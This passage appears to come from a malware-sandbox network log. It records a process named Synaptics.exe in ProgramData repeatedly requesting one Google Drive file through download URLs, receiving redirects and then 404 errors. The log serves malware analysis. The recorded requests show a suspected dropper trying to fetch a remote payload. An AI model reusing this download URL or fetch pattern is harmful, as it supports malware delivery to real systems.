                                                                                                                                2024-12-24 17:20:27 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="9dRJ9c_3_d9cP2zIV4DW3g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:20:27 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                17 | 192.168.2.4 | 49785 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:26 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:26 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-2Oeix1kbhMZhu3GS3V4gMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49797 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:29 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-fvlCYELl41PqXhkerO9T9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49796 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:29 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-buDtSk0XLYAIC6ror5To0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49809 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:33 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:33 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-5GaI3edbbw8_vlPL48Aw6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49808 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:33 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:33 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-yDBO2sODO2HOQQ-_TNqMLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49812 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:35 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:20:36 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC4u0lSID1zzAXLQJG-rTuJh_Nx_Vfp50tDAkJVjOksdhwJutPRF71ygh9Hod4SND2ZHl4nQjgU
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:36 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-9YTkUaGjEx_QvvEhCactiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
2024-12-24 17:20:36 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-24 17:20:36 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="9HrVOhBr_7rwQFdXzdh2Lw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:20:36 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 23 | 192.168.2.4 | 49813 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 2024-12-24 17:20:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                 2024-12-24 17:20:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:36 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-0P2YMLq2c9Gv2w7DrfOTjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 24 | 192.168.2.4 | 49815 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 2024-12-24 17:20:35 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                 2024-12-24 17:20:37 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6d5SN9AdnhOBBWLb-s1OKXjXrPz6ADKiozYqvNFa0PSZXr13es3ZnN218mBqSGqyZ9uvAE1F0
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:36 GMT
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-VyPfAxRWUC7bV0sdXzrOvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                 2024-12-24 17:20:37 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                 2024-12-24 17:20:37 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="kg4bYPLhWYnk2ARQ_KX9wQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                 2024-12-24 17:20:37 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 25 | 192.168.2.4 | 49814 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 2024-12-24 17:20:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                 2024-12-24 17:20:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:36 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-hQRIT4co2CLLMdsU_qKW_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 26 | 192.168.2.4 | 49824 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 2024-12-24 17:20:39 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                 2024-12-24 17:20:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:39 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-KxujTq7vFpDS5VwI7QD0zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 27 | 192.168.2.4 | 49823 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 2024-12-24 17:20:39 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                 2024-12-24 17:20:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:39 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-RuOGCuEmDQdFjIjnd6btrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 28 | 192.168.2.4 | 49829 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 2024-12-24 17:20:42 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
